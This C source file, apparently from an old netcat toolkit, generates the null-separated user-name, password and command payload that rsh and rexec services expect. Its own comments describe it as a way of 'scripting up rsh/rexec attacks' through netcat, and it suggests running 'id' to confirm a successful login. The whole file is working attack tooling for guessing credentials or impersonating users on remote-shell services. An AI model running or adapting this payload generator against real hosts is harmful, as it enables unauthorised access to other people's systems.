/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
   rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.

   args:
        locuser remuser [cmd]
        remuser passwd [cmd]

   cmd defaults to "pwd".

   ... whatever.  _H*/

#include <stdio.h>

/* change if you like; "id" is a good one for figuring out if you won too */
static char cmd[] = "pwd";

static char buf [4096];

main(argc, argv)
int argc;
char * argv[];
{
	register int x;
	register int y;
	char * p;
	char * q;

	p = buf;
	memset(buf, 0, sizeof(buf));

	p++;                    /* first null */
	y = 1;

	if (!argv[1])
		goto wrong;
	strncpy(p, argv[1], sizeof(buf) - y); /* first arg plus another null */
	x = strlen(argv[1]) + 1;
	p += x;
	y += x;
	if (y >= sizeof(buf))
		goto over;

	if (!argv[2])
		goto wrong;
	strncpy(p, argv[2], sizeof(buf) - y);   /* second arg plus null */
	x = strlen(argv[2]) + 1;
	p += x;
	y += x;
	if (y >= sizeof(buf))
		goto over;

	q = cmd;
	if (argv[3])
		q = argv[3];
	strncpy(p, q, sizeof(buf) - y); /* the command, plus final null */
	x = strlen(q) + 1;
	p += x;
	y += x;
	if (y >= sizeof(buf))
		goto over;

	strncpy(p, "\n", sizeof(buf) - y); /* and a newline, so it goes */
	y++;

	write(1, buf, y);       /* zot! */
	exit(0);

wrong:
	fprintf(stderr, "wrong!  needs 2 or more args.\n");
	exit(1);

over:
	fprintf(stderr, "out of memory!\n");
	exit(1);
}